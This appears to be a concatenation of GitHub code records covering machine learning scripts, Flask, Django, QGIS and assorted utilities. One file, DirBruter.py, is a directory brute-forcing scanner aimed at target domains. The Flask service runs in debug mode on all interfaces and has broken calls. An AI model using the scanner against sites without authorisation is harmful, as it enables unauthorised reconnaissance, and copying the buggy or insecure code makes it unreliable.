StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.datasets import load_iris, load_wine, load_boston\n\n\n\nfeatures, labels = load_wine(return_X_y=True)\nX_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.3, random_state=42)\n\nmodel_nb = make_pipeline(PCA(n_components=4), GaussianNB())\nmodel_nb.fit(X_train, y_train)\nprediction = model_nb.predict(X_test)\n\nmodel_nb_scale = make_pipeline(StandardScaler(), PCA(n_components=4), GaussianNB())\nmodel_nb_scale.fit(X_train, y_train)\nprediction_scaled = model_nb_scale.predict(X_test)\n\nprint(len(features[0]))\n\naccuracy = accuracy_score(prediction, y_test)\nprint('accuracy of model_nb:', accuracy)\n\n\naccuracy = accuracy_score(prediction_scaled, y_test)\nprint('accuracy of model_nb_scaled:', accuracy)\n\npca = model_nb_scale.named_steps['pca']\nscaler = model_nb_scale.named_steps['standardscaler']\n\n\n#x_transformed = model_nb_scale.transform(scaler.transform(train_x))\nX_train_std = pca.transform(scaler.transform(X_train))\n\nFIG_SIZE = (10,10)\n#fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=FIG_SIZE)\nfig = plt.figure(\"test\", figsize=FIG_SIZE)\n#(ax1,ax2) = Axes3D(fig, elev=45, azim=130)\n#ax = fig.(1,1, projection='3d')\nax1 = fig.add_subplot(121, projection='3d')\nax2 = fig.add_subplot(122, projection='3d')\n\nfor l, c, m in zip(range(0, 3), ('blue', 'red', 'green'), ('^', 's', 'o')):\n x = X_train[y_train == l, 0]\n y = X_train[y_train == l, 1]\n z = X_train[y_train == l, 2]\n ax1.scatter(x, y, z, color=c, marker=m, alpha=0.5)\n\nfor l, c, m in zip(range(0, 3), ('blue', 'red', 'green'), ('^', 's', 'o')):\n x = X_train_std[y_train == l, 0]\n y = X_train_std[y_train == l, 1]\n z = X_train_std[y_train == l, 2]\n ax2.scatter(x, y, z, color=c, marker=m, alpha=0.5)\n\nax1.set_title(\"Training set after PCA\")\nax2.set_title(\"Training set after PCA with standardizer\")\n\nfor a in (ax1, ax2):\n a.set_xlabel('pca component 1')\n a.set_ylabel('pca component 2')\n a.set_zlabel('pca component 3')\n a.grid()\n\nplt.show()\n","repo_name":"ssalgadoe/ML_SCIKIT_Neural_NETs","sub_path":"standardizer_effect_3d.py","file_name":"standardizer_effect_3d.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72944561530","text":"\"\"\"Prediction module\"\"\"\n\nimport os\nimport pickle\n\nimport mlflow\nimport pandas as pd\nimport requests\nfrom flask import Flask, flash, jsonify, request, render_template\nfrom pymongo import MongoClient\n\nEXPERIMENT_NAME = os.getenv(\"EXPERIMENT_NAME\", \"used-car-prediction\")\nMLFLOW_ENABLED = os.getenv(\"MLFLOW_ENABLED\", \"False\") == \"True\"\nMLFLOW_TRACKING_URI = os.getenv(\"MLFLOW_TRACKING_URI\", \"http://localhost:5000\")\nDEFAULT_MODEL_ENABLED = os.getenv(\"DEFAULT_MODEL_ENABLED\", \"True\") == \"True\"\nMONITORING_ENABLED = os.getenv(\"MONITORING_ENABLED\", \"False\") == \"True\"\nEVIDENTLY_SERVICE_URI = os.getenv(\"EVIDENTLY_SERVICE_URI\", \"http://localhost:8085\")\nMONGODB_URI = os.getenv(\"MONGODB_URI\", \"mongodb://localhost:27017\")\nif not os.getenv(\"MLFLOW_S3_ENDPOINT_URL\"):\n os.environ[\"MLFLOW_S3_ENDPOINT_URL\"] = \"http://localhost:9000\"\n\nif MONITORING_ENABLED:\n mongo_client = MongoClient(MONGODB_URI)\n db = mongo_client.get_database(\"prediction_service\")\n collection = db.get_collection(EXPERIMENT_NAME)\n\n\ndef load_model_from_registry():\n \"\"\"\n Loads the ML model from the MLFlow registry\n \"\"\"\n mlflow.set_tracking_uri(MLFLOW_TRACKING_URI)\n model_uri = f\"models:/{EXPERIMENT_NAME}/latest\"\n loaded_model = mlflow.pyfunc.load_model(model_uri)\n print(\"Loaded model from S3 Bucket\")\n return loaded_model\n\n\ndef load_default_model():\n \"\"\"\n Loads the default ML model from disk\n \"\"\"\n with open(\"pickle/model.pkl\", \"rb\") as f_in:\n loaded_model = pickle.load(f_in)\n print(\"Loaded default model from disk\")\n return loaded_model\n\n\ndef load_model():\n \"\"\"\n Loads the ML model\n \"\"\"\n try:\n if MLFLOW_ENABLED:\n return load_model_from_registry()\n\n if DEFAULT_MODEL_ENABLED:\n return load_default_model()\n except:\n if DEFAULT_MODEL_ENABLED:\n return load_default_model()\n\n return None\n\ndef validate_data(record):\n \"\"\"\n Performs data validation\n \"\"\"\n if record[\"vehicle_age\"] < 0 or record[\"vehicle_age\"] > 30:\n return \"Vehicle_age should be between 0 and 30 years\"\n \n if record[\"mileage\"] < 4.0 or record[\"mileage\"] > 33.0:\n return \"Mileage should be between 4.0 and 33.0 years\"\n \n if record[\"max_power\"] < 38.0 or record[\"max_power\"] > 626.0:\n return \"Max power should be between 38.0 and 626.0 years\"\n \n if record[\"seats\"] < 1 or record[\"seats\"] > 9:\n return \"Seats should be between 1 and 9\"\n \n return None\n\ndef predict(model, df):\n \"\"\"\n Predicts the car market value\n \"\"\"\n predict = model.predict(df)\n return predict[0]\n\n\ndef save_to_db(record, selling_price):\n \"\"\"\n Saves the prediction data to the Mongo database\n \"\"\"\n rec = record.copy()\n rec[\"selling_price\"] = selling_price\n collection.insert_one(rec)\n\n\n# def send_to_evidently_service(record, selling_price):\n# \"\"\"\n# Sends the prediction data to the Evidently monitoring service\n# \"\"\"\n# rec = record.copy()\n# rec[\"selling_price\"] = selling_price\n# requests.post(f\"{EVIDENTLY_SERVICE_URI}/iterate/---\", json=[rec])\n\n\ndef calculate_selling_price(record):\n \"\"\"\n Calculates the car's selling_price\n \"\"\"\n selling_price = predict(record)\n if MONITORING_ENABLED:\n save_to_db(record, selling_price)\n send_to_evidently_service(record, selling_price)\n return selling_price\n\ndef load_list():\n \"\"\"\n Get model and brand list from a pickle file\n \"\"\"\n file = open(\"pickle/carnamelist.pkl\", 'rb')\n model_list = pickle.load(file)\n brand_list = pickle.load(file)\n file.close()\n return model_list, brand_list\n\ndef transform_data(dict_data):\n \"\"\" Pre-Process data from request data\n \"\"\"\n input_data = pd.DataFrame.from_dict(dict_data, orient='index').T\n with open(\"pickle/preprocess.pkl\" , \"rb\")as f:\n preprocessor = pickle.load(f)\n input_data = preprocessor.transform(input_data)\n \n return input_data\n\n\napp = Flask(EXPERIMENT_NAME)\napp.secret_key = os.urandom(24)\n\nmodel = load_model()\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef predict_form_endpoint():\n \"\"\"\n Prediction form endpoint\n \"\"\"\n model_list, brand_list = load_list()\n \n if request.method == \"POST\":\n record = {}\n record[\"brand\"] = request.form.get(\"brand\")\n record[\"model\"] = request.form.get(\"model\")\n record[\"vehicle_age\"] = int(request.form.get(\"vehicle_age\"))\n record[\"km_driven\"] = int(request.form.get(\"km_driven\"))\n record[\"seller_type\"] = request.form.get(\"seller_type\")\n record[\"fuel_type\"] = request.form.get(\"fuel_type\")\n record[\"transmission_type\"] = request.form.get(\"transmission\")\n record[\"mileage\"] = float(request.form.get(\"mileage\"))\n record[\"engine\"] = int(request.form.get(\"engine\"))\n record[\"max_power\"] = float(request.form.get(\"max_power\"))\n record[\"seats\"] = int(request.form.get(\"seats\"))\n \n input_data = transform_data(record)\n \n error_message = validate_data(record)\n if error_message:\n flash(error_message, 'info')\n else:\n selling_price = predict(model, input_data)\n flash(f\"is the market selling price of the Car model {record['model']}\", selling_price)\n\n return render_template(\"index.html\", model_list=model_list, brand_list=brand_list)\n\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict_json_endpoint():\n \"\"\"\n Prediction API endpoint\n \"\"\"\n record = request.get_json()\n\n error_message = validate_data(record)\n if error_message:\n return jsonify({\"Error\": error_message})\n\n selling_price = calculate_selling_price(record)\n return jsonify({\"selling_price\": selling_price})\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host=\"0.0.0.0\", port=8080)","repo_name":"aravind-selvam/mlflow-integrated-project","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25870205409","text":"import sys\n\nStop = (str())\n\nwhile Stop !=\"n\":\n \n Invoice_Date = (str(input(\"Enter Invoice Date / Bill Date \")))\n Program_Code = (str(input(\"Enter Program Code \")))\n Recipient_ID = (str(input(\"Enter Four Digit Recipient ID \")))\n Activity_Code = (str(input(\"Enter Activity Code \")))\n FPN = (str(input(\"Federal Project Number \")))\n Object_Class = (str(input(\"Enter Project Class \")))\n Demo_ID = (str(input(\"Enter Demo ID \")))\n Transaction_Type = (str(input(\"Enter Transaction Type \")))\n Amount = (str(input(\"Enter Amount \")))\n RPD = (str(input(\"Enter Requested Payment Date \")))\n\n\n print(Invoice_Date,\"|\",Program_Code,\"|\",Recipient_ID,\"|\",Activity_Code,\"|\",FPN,\"|\",Object_Class,\"|\",Demo_ID,\"|\",Transaction_Type,\"|\",Amount,\"|\",RPD,sep='',end ='\\n')\n \n original_stdout = sys.stdout \n \n with open('FHWA_Bill.txt', 'a+') as f:\n sys.stdout = f \n print(Invoice_Date,\"|\",Program_Code,\"|\",Recipient_ID,\"|\",Activity_Code,\"|\",FPN,\"|\",Object_Class,\"|\",Demo_ID,\"|\",Transaction_Type,\"|\",Amount,\"|\",RPD,sep='',end ='\\n')\n # Reset the standard output\n sys.stdout = original_stdout \n \n Stop = (str(input(\"would you like to enter another FHWA Bill? Y/N \")))\n","repo_name":"IncompleteString/FHWA_BIll_Gen","sub_path":"TBP.py","file_name":"TBP.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7924922266","text":"from django.conf.urls.defaults import *\n\n# Uncomment the next two lines to enable the admin:\n#from django.contrib import admin\n#admin.autodiscover()\n\nurlpatterns = patterns('accounts.views',\n # Example:\n (r'^$', 'index'),\n (r'^index.html', 'index'),\n (r'^exists.html', 'exists'),\n (r'^confirmation.html', 'confirmation'),\n (r'^confirmed.html', 'confirmed'),\n (r'^signup.html', 'signup'),\n (r'^login.html', 'login'),\n (r'^logout.html', 'logout'),\n (r'^confirm/(?P\\w+)$', 'confirm'),\n\n # Uncomment the admin/doc line below and add 'django.contrib.admindocs' \n # to INSTALLED_APPS to enable admin documentation:\n # (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # (r'^admin/(.*)', admin.site.root),\n)\n","repo_name":"mschenck/django-devel","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33516035517","text":"from django.contrib.auth import get_user_model\nfrom django.db import models\n\nfrom store.models.store import Store\n\nUser = get_user_model()\n\n\nclass Address(models.Model):\n old_address = models.CharField(verbose_name='지번주소', max_length=100)\n address = models.CharField(verbose_name='도로명 주소', max_length=100)\n detail_address = models.CharField(verbose_name='상세주소', max_length=100, blank=True)\n # 위도, 경도 (정수 부분 4자리, 소수점 이하 자리수 6자리)\n # lat(latitude): 위도 lng(longitude): 경도\n lat = models.DecimalField(verbose_name='위도', max_digits=17, decimal_places=14)\n lng = models.DecimalField(verbose_name='경도', max_digits=17, decimal_places=14)\n user = models.ForeignKey(\n User,\n on_delete=models.SET_NULL,\n verbose_name='사용자',\n related_name='is_host_address_set',\n related_query_name='is_host_address',\n blank=True,\n null=True,\n )\n store = models.ForeignKey(\n Store,\n on_delete=models.SET_NULL,\n verbose_name='상점',\n related_name='is_store_address_set',\n related_query_name='is_store_address',\n blank=True,\n null=True,\n )\n created_at = models.DateTimeField(verbose_name='등록일', auto_now=True)\n\n class Meta:\n verbose_name = '주소'\n verbose_name_plural = f'{verbose_name} 목록'\n\n def __str__(self):\n return '{present} {detail}'.format(\n present=self.address,\n detail=self.detail_address,\n )\n","repo_name":"hanyonghee9264/TeamProject_FoodFly","sub_path":"app/address/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3219531231","text":"from typing import List\n\nfrom qgis.core import QgsFeatureRequest\n\nfrom qgis.PyQt.QtWidgets import QMessageBox\n\nfrom qgis.PyQt.QtCore import pyqtSignal\nfrom qgis.core import QgsPointXY, QgsCoordinateReferenceSystem, QgsRectangle\n\nfrom qgis.core import \\\n QgsVectorLayerTools, QgsVectorLayer, Qgis, \\\n QgsSettings, \\\n QgsVectorDataProvider, \\\n QgsFeature, QgsGeometry, QgsProject\n\nfrom qgis.gui import QgisInterface\n\nfrom .utils import SpatialExtent, SpatialPoint, featureBoundingBox\n\n\nclass VectorLayerTools(QgsVectorLayerTools):\n \"\"\"\n Implements QgsVectorLayerTools with some additional routines\n \"\"\"\n sigMessage = pyqtSignal(str, str, Qgis.MessageLevel)\n sigEditingStarted = pyqtSignal(QgsVectorLayer)\n sigEditingStopped = pyqtSignal(QgsVectorLayer)\n sigFreezeCanvases = pyqtSignal(bool)\n sigZoomRequest = pyqtSignal(QgsCoordinateReferenceSystem, QgsRectangle)\n sigPanRequest = pyqtSignal(QgsCoordinateReferenceSystem, QgsPointXY)\n sigFlashFeatureRequest = pyqtSignal(QgsVectorLayer, list)\n\n def __init__(self, *args, **kwds):\n super(VectorLayerTools, self).__init__(*args, **kwds)\n pass\n\n def addFeature(self, layer: QgsVectorLayer,\n defaultValues: dict = dict(),\n defaultGeometry: QgsGeometry = None,\n f: QgsFeature = QgsFeature(),\n action_name: str = \"Add feature\") -> bool:\n \"\"\"\n This method should/will be called, whenever a new feature will be added to the layer.\n \"\"\"\n from .maptools import QgsFeatureAction\n a = QgsFeatureAction(action_name, f, layer, None, None)\n return a.addFeature(defaultValues)\n\n def startEditing(self, layer: QgsVectorLayer) -> bool:\n \"\"\"\n This will be called, whenever a vector layer should be switched to edit mode.\n \"\"\"\n if not isinstance(layer, QgsVectorLayer):\n return False\n\n if not layer.isEditable() and not layer.readOnly():\n\n if not (layer.dataProvider().capabilities() & QgsVectorDataProvider.EditingCapabilities):\n title = \"Start editing failed\"\n msg = \"Provider cannot be opened for editing\"\n self.sigMessage.emit(title, msg, Qgis.Information)\n return False\n layer.startEditing()\n if layer.isEditable():\n self.sigEditingStarted.emit(layer)\n return layer.isEditable()\n\n def cutSelectionToClipboard(self, layer: QgsVectorLayer):\n import qgis.utils\n if isinstance(layer, QgsVectorLayer) and layer.isEditable() and isinstance(qgis.utils.iface, QgisInterface):\n self.copySelectionToClipboard(layer)\n self.deleteSelection(layer)\n\n def copySelectionToClipboard(self, layer: QgsVectorLayer, attributes: list = None, featureIds: list = None):\n \"\"\"\n Copies selected features to the clipboard\n \"\"\"\n import qgis.utils\n\n if isinstance(layer, QgsVectorLayer) and isinstance(qgis.utils.iface, QgisInterface):\n qgis.utils.iface.copySelectionToClipboard(layer)\n\n def pasteFromClipboard(self, layer: QgsVectorLayer):\n import qgis.utils\n if isinstance(layer, QgsVectorLayer) and layer.isEditable() and isinstance(qgis.utils.iface, QgisInterface):\n qgis.utils.iface.pasteFromClipboard(layer)\n\n def invertSelection(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer):\n layer.invertSelection()\n\n def removeSelection(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer):\n layer.removeSelection()\n\n def selectAll(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer):\n layer.selectAll()\n\n def deleteSelection(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer) and layer.isEditable():\n context = QgsVectorLayer.DeleteContext(True, QgsProject.instance())\n layer.beginEditCommand('Features deleted')\n success, deleted_fids = layer.deleteSelectedFeatures(context)\n layer.endEditCommand()\n\n def toggleEditing(self, vlayer: QgsVectorLayer, allowCancel: bool = True) -> bool:\n \"\"\"\n Changes the editing state. Returns True if the change was successful.\n \"\"\"\n if not isinstance(vlayer, QgsVectorLayer):\n return False\n\n res: bool = True\n isEditable = vlayer.isEditable()\n isModified = vlayer.isModified()\n\n if isEditable:\n return self.stopEditing(vlayer, allowCancel=allowCancel)\n else:\n if not self.startEditing(vlayer):\n return False\n settings = QgsSettings()\n markerType = str(settings.value(\"qgis/digitizing/marker_style\", \"Cross\"))\n markSelectedOnly = bool(settings.value(\"qgis/digitizing/marker_only_for_selected\", True))\n\n # // redraw only if markers will be drawn\n if not markSelectedOnly or (vlayer.selectedFeatureCount() > 0\n and (markerType == \"Cross\" or markerType == \"SemiTransparentCircle\")):\n vlayer.triggerRepaint()\n\n return True\n\n def zoomToSelected(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer) and layer.selectedFeatureCount() > 0:\n bbox = layer.boundingBoxOfSelected()\n ext = SpatialExtent(layer.crs(), bbox)\n self.sigZoomRequest[QgsCoordinateReferenceSystem, QgsRectangle].emit(ext.crs(), QgsRectangle(ext))\n\n def featureBoundingBox(self, layer: QgsVectorLayer, featureIds: List[int]):\n request = QgsFeatureRequest()\n request.setFilterFids(featureIds)\n request.setNoAttributes()\n return featureBoundingBox(layer.getFeatures(request))\n\n def zoomToFeatures(self, layer: QgsVectorLayer, featureIds: List[int]):\n bbox = self.featureBoundingBox(layer, featureIds)\n ext = SpatialExtent(layer.crs(), bbox)\n self.sigZoomRequest[QgsCoordinateReferenceSystem, QgsRectangle].emit(ext.crs(), ext)\n\n def panToFeatures(self, layer: QgsVectorLayer, featureIds: List[int]):\n bbox = self.featureBoundingBox(layer, featureIds)\n pt = SpatialPoint(layer.crs(), bbox.center())\n self.sigPanRequest[QgsCoordinateReferenceSystem, QgsPointXY].emit(pt.crs(), pt)\n\n def flashFeatures(self, layer: QgsVectorLayer, featureIds: List[int]):\n self.sigFlashFeatureRequest.emit(layer, featureIds)\n\n def panToSelected(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer) and layer.selectedFeatureCount() > 0:\n bbox = layer.boundingBoxOfSelected()\n pt = SpatialPoint(layer.crs(), bbox.center())\n self.sigPanRequest[QgsCoordinateReferenceSystem, QgsPointXY].emit(pt.crs(), pt)\n\n def rollBackEdits(self, layer: QgsVectorLayer, leave_editable: bool = True, trigger_repaint: bool = False) -> bool:\n self.sigFreezeCanvases.emit(True)\n if not layer.rollBack():\n title = 'Error'\n text = 'Problems during rollback'\n result = False\n self.sigMessage.emit(title, text, Qgis.Critical)\n else:\n result = True\n self.sigFreezeCanvases.emit(False)\n if trigger_repaint:\n layer.triggerRepaint()\n return result\n\n def saveEdits(self, layer: QgsVectorLayer, leave_editable: bool = True, trigger_repaint: bool = False) -> bool:\n \"\"\"\n Should be called, when the features should be committed but the editing session is not ended.\n \"\"\"\n if not isinstance(layer, QgsVectorLayer):\n return False\n\n result = True\n if layer.isModified():\n if not layer.commitChanges():\n self.commitError(layer)\n result = False\n\n if trigger_repaint:\n layer.triggerRepaint()\n\n if leave_editable:\n layer.startEditing()\n\n return result\n\n def stopEditing(self, layer: QgsVectorLayer, allowCancel: bool) -> bool:\n \"\"\"\n Will be called, when an editing session is ended and the features should be committed.\n Returns True if the layers edit state was finished\n \"\"\"\n if not isinstance(layer, QgsVectorLayer):\n return False\n\n if layer.isModified():\n buttons = QMessageBox.Yes | QMessageBox.No\n if allowCancel:\n buttons = buttons | QMessageBox.Abort\n\n button = QMessageBox.question(None,\n 'Stop Editing',\n 'Do you want to save the changes to layer {}'.format(layer.name()),\n buttons)\n\n if button == QMessageBox.Abort:\n return False\n elif button == QMessageBox.Yes:\n self.saveEdits(layer, leave_editable=False, trigger_repaint=True)\n elif button == QMessageBox.No:\n self.rollBackEdits(layer, leave_editable=False, trigger_repaint=True)\n else:\n layer.commitChanges()\n if not layer.isEditable():\n self.sigEditingStopped.emit(layer)\n return not layer.isEditable()\n\n def commitError(self, layer: QgsVectorLayer):\n \"\"\"\n collects the layer's commit errors and emits the sigMessage with a warning.\n \"\"\"\n title = 'Commit Errors'\n\n info = \"Could not commit changes to layer {}\".format(layer.name())\n info += \"\\n\\n{}\".format('\\n '.join(layer.commitErrors()))\n\n self.sigMessage.emit(title, info, Qgis.Warning)\n","repo_name":"EnMAP-Box/qgispluginsupport","sub_path":"qps/vectorlayertools.py","file_name":"vectorlayertools.py","file_ext":"py","file_size_in_byte":9675,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"69905803448","text":"import asyncio\nimport os\nimport sys\nfrom asyncio import CancelledError\n\nimport aiohttp\nimport argparse\n\nfrom BaseObject import BaseObject\n\nclass DirBruter(BaseObject):\n\n def __init__(self):\n BaseObject.__init__(self)\n self.domains = []\n self.queryResult = {}\n\n args = self.argparser()\n # 生成主域名列表,待检测域名入队\n target = args.target\n self.threads = args.threads\n self.typeList = args.file.split(',')\n if not os.path.isfile(target):\n # target = 'http://' + target\n self.domains.append(target)\n elif os.path.isfile(target):\n with open(target, 'r+', encoding='utf-8') as f:\n for domain in f:\n domain = domain.strip()\n if not domain.startswith(('http://', 'https://')):\n self.domains.append(domain)\n\n self.headers = {}\n self.buildHeader()\n\n def argparser(self):\n \"\"\"\n 解析参数\n :return:参数解析结果\n \"\"\"\n parser = argparse.ArgumentParser(description='InfoScripts can help you collect target\\'s information',\n epilog='\\tUsage:\\npython3 ' + sys.argv[0] + \" --target www.baidu.com --file php,shell\")\n parser.add_argument('--target', '-t', help='A target like www.example.com or subdomains.txt', required=True)\n parser.add_argument('--file', '-f', help='The dict you chose to brute', required=True)\n\n args = parser.parse_args()\n return args\n\n def startQuery(self):\n try:\n tasks = []\n newLoop = asyncio.new_event_loop()\n asyncio.set_event_loop(newLoop)\n loop = asyncio.get_event_loop()\n\n for domain in self.domains:\n if os.path.exists(os.getcwd() + '/result/' + domain + '/') is False:\n os.mkdir(os.getcwd() + '/result/' + domain + '/')\n\n tasks.append(asyncio.ensure_future(self.dirBrute('http://' + domain, sem)))\n\n loop.run_until_complete(asyncio.wait(tasks))\n except KeyboardInterrupt:\n self.logger.info('[+]Break By User.')\n except CancelledError:\n pass\n\n self.writeResult()\n\n async def dirBrute(self, domain):\n \"\"\"\n \"\"\"\n\n self.queryResult[domain.replace('http://', '')] = {}\n self.queryResult[domain.replace('http://', '')]['200'] = []\n self.queryResult[domain.replace('http://', '')]['403'] = []\n\n for filename in self.typeList:\n with open(os.path.dirname(os.path.abspath(__file__)) + '/Config/Dir/' + filename + '.txt', 'r', encoding='utf-8') as fp:\n for row in fp.readlines():\n url = domain + row.strip()\n sem = asyncio.Semaphore(self.threads)\n try:\n async with aiohttp.ClientSession(connector=aiohttp.TCPConnector()) as session:\n async with sem:\n # 设置禁止跳转\n async with session.get(url, timeout=20, headers=self.headers, allow_redirects=False) as req:\n await asyncio.sleep(1)\n if req.status == 200:\n self.queryResult[domain.replace('http://', '')]['200'].append(url)\n elif req.status == 403:\n self.queryResult[domain.replace('http://', '')]['403'].append(url)\n req.close()\n except CancelledError:\n pass\n except ConnectionResetError:\n pass\n except Exception as e:\n self.logger.info('[-]DirBruter: {} http请求失败'.format(domain))\n\n return None\n\n def writeResult(self):\n \"\"\"\n 保存结果\n :return:\n \"\"\"\n\n for domain in self.domains:\n with open(os.path.dirname(os.path.abspath(__file__)) + '/result/' + domain + \"/\" + 'dir-200' + '.txt', 'w') as fpResult:\n for row in self.queryResult[domain.replace('http://', '')]['200']:\n fpResult.write(row + '\\r\\n')\n\n with open(os.path.dirname(os.path.abspath(__file__)) + '/result/' + domain + \"/\" + 'dir-403' + '.txt', 'w') as fpResult:\n for row in self.queryResult[domain.replace('http://', '')]['403']:\n fpResult.write(row + '\\r\\n')\n\nif __name__ == '__main__':\n dirBrute = DirBruter()\n dirBrute.startQuery()","repo_name":"fatmo666/InfoScripts","sub_path":"DirBruter.py","file_name":"DirBruter.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"77"} +{"seq_id":"5430595558","text":"import pygame\nimport sys\nimport GameEntity\nimport ResourceManager\nimport SceneManager\nimport GameObject\nfrom SceneBase import SceneBase\nfrom BattleScene import BattleScene\nfrom MenuScene import MenuScene\n# from NewBattleScene import NewBattleScene\n\nclass StartScene(SceneBase):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.title = GameObject.GameObject()\n\t\tself.titleBg = GameObject.GameObject()\n\t\tself.pressAnyKey = GameObject.GameObject()\n\t\tself.flag = False\n\n\n\n\tdef init(self):\n\t\tsuper().init()\n\t\tResourceManager.instance.load(\"Title\", \"image\", \"Title.png\")\n\t\tResourceManager.instance.load(\"TitleBg\", \"image\", \"TitleBg.png\")\n\t\tResourceManager.instance.load(\"PressAnyKey\", \"image\", \"PressAnyKey.png\")\n\t\tself.title.init(ResourceManager.instance.getResourceHandler(\"Title\"), (150, 100), (550, 260))\n\t\tself.titleBg.init(ResourceManager.instance.getResourceHandler(\"TitleBg\"), (0, 0), (800, 600))\n\t\tself.pressAnyKey.init(ResourceManager.instance.getResourceHandler(\"PressAnyKey\"), (300, 500), (200, 30))\n\n\n\n\tdef start(self):\n\t\tsuper().start()\n\n\n\n\tdef update(self, events):\n\t\tsuper().update(events)\n\t\tfor event in events:\n\t\t\t# print(event)\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tSceneManager.instance.switchScene(None)\n\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN or event.type == pygame.KEYDOWN:\n\t\t\t\tself.flag = True\n\n\t\t\tif (event.type == pygame.MOUSEBUTTONUP or event.type == pygame.KEYUP) and self.flag:\n\t\t\t\tSceneManager.instance.switchScene(MenuScene())\n\t\t\t\t# SceneManager.instance.switchScene(NewBattleScene())\n\n\n\n\tdef draw(self):\n\t\tsuper().draw()\n\t\tself.titleBg.draw(self.screen)\n\t\tself.title.draw(self.screen)\n\t\tself.pressAnyKey.draw(self.screen)\n\n\n\n\tdef destroy(self):\n\t\tsuper().destroy()\n\t\tResourceManager.instance.unload(\"Title\")\n\t\tResourceManager.instance.unload(\"TitleBg\")\n\t\tResourceManager.instance.unload(\"PressAnyKey\")\n\n","repo_name":"Vanishedphreeze/ValenciaSaga","sub_path":"StartScene.py","file_name":"StartScene.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39790339401","text":"import subprocess\nfrom PYME.IO import clusterIO\nimport tempfile\nimport os\nimport shutil\n#import unittest\nimport time\n\nproc = None\ntmp_root = None\n\ndef setup_module():\n global proc, tmp_root\n tmp_root = os.path.join(tempfile.gettempdir(), 'PYMEDataServer_TEST')\n os.makedirs(tmp_root)\n proc = subprocess.Popen('PYMEDataServer -r %s -f TEST' % tmp_root , shell=True)\n \n \ndef teardown_module():\n global proc, tmp_root\n #proc.send_signal(1)\n #time.sleep(1)\n proc.kill()\n \n shutil.rmtree(tmp_root)\n \n \ndef test_put():\n testdata = 'foo bar\\n'\n clusterIO.putFile('_testing/test.txt', testdata, 'TEST')\n retrieved = clusterIO.getFile('_testing/test.txt', 'TEST')\n \n assert testdata == retrieved\n \ndef test_putfiles_and_list():\n test_files = [('_testing/test_list/file_%d' % i, 'testing ... \\n') for i in range(10)]\n \n clusterIO.putFiles(test_files, 'TEST')\n \n listing = clusterIO.listdir('_testing/test_list/')\n \n assert(len(listing) == 10)\n\n\ndef test_double_put():\n \"\"\"Trying to put the same file twice should cause an error\"\"\"\n testdata = 'foo bar\\n'\n\n clusterIO.putFile('_testing/test_d.txt', testdata, 'TEST')\n \n try:\n clusterIO.putFile('_testing/test_d.txt', testdata, 'TEST')\n raise AssertionError('Second put attempt did not raise an error')\n except RuntimeError:\n #we want to generate this error\n pass\n \n #retrieved = clusterIO.getFile('test.txt', 'TEST')\n \n #assert testdata == retrieved\n \ndef test_aggregate_h5r():\n import numpy as np\n from PYME.IO import clusterResults\n testdata = np.ones(10, dtype=[('a', ' 0 :\n for id in book_ids:\n book = Book.objects.get(id=id)\n books.append(book)\n total_price += book.price\n return render(request, 'cart/show_carts.html',{'books':books,'total_price':total_price})\n messages.warning(request,'your cart is empty','warning')\n return redirect('book:home')\ndef add_cart(request,book_id):\n cart = Cart(request)\n cart.add(book_id)\n return redirect('cart:show_carts')","repo_name":"dfpj/book_shop","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27099721089","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n if len(nums)==0:\n return [[]]\n tmp = self.subsets(nums[1:])\n ans = []\n for l in tmp:\n ans.append([nums[0]]+l)\n ans.append(l)\n return ans","repo_name":"0xtinyuk/LeetCode","sub_path":"Algorithms/78. Subsets.py","file_name":"78. Subsets.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16419495665","text":"#Importando socket\nimport socket\n\n# Definindo Host e porta do terminal.\nHOST = '127.0.0.2'\nPORT = 5000\n\n#Conectando os terminais.\n\nudp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\norig = (HOST, PORT)\nudp.bind(orig)\n\n# Adicionando Print para efeito estetico e de testes.\n\nprint(\"Sucesso ao iniciar TV, no aguardo de senhas!\\n\")\n\n# Criando condição para transformar senha em padrão 